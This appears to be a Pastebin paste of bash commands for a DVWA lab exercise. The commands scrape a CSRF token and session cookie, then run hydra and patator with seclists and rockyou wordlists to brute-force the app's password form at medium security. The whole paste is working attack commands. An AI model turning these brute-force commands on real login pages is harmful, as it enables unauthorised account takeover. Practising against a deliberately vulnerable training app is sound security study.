Advertisement
Guest User

Untitled

a guest
Apr 22nd, 2017
155
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.07 KB | None | 0 0
  1. CSRF=$(curl -s -c dvwa.cookie "192.168.1.44/DVWA/login.php" | awk -F 'value=' '/user_token/ {print $2}' | cut -d "'" -f2)
  2. SESSIONID=$(grep PHPSESSID dvwa.cookie | cut -d $'\t' -f7)
  3. curl -s -b dvwa.cookie -d "username=admin&password=password&user_token=${CSRF}&Login=Login" "192.168.1.44/DVWA/login.php" >/dev/null
  4.  
  5. hydra -L /usr/share/seclists/Usernames/top_shortlist.txt -P /usr/share/seclists/Passwords/rockyou-40.txt \
  6. -e ns -F -u -t 4 -w 15 -v -V 192.168.1.44 http-get-form \
  7. "/DVWA/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:S=Welcome to the password protected area:H=Cookie\: security=medium; PHPSESSID=${SESSIONID}"
  8.  
  9. patator http_fuzz method=GET follow=0 accept_cookie=0 --threads=4 timeout=15 --max-retries=0 \
  10. url="http://192.168.1.44/DVWA/vulnerabilities/brute/?username=FILE1&password=FILE0&Login=Login" \
  11. 1=/usr/share/seclists/Usernames/top_shortlist.txt 0=/usr/share/seclists/Passwords/rockyou-40.txt \
  12. header="Cookie: security=medium; PHPSESSID=${SESSIONID}" \
  13. -x quit:fgrep='Welcome to the password protected area'
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement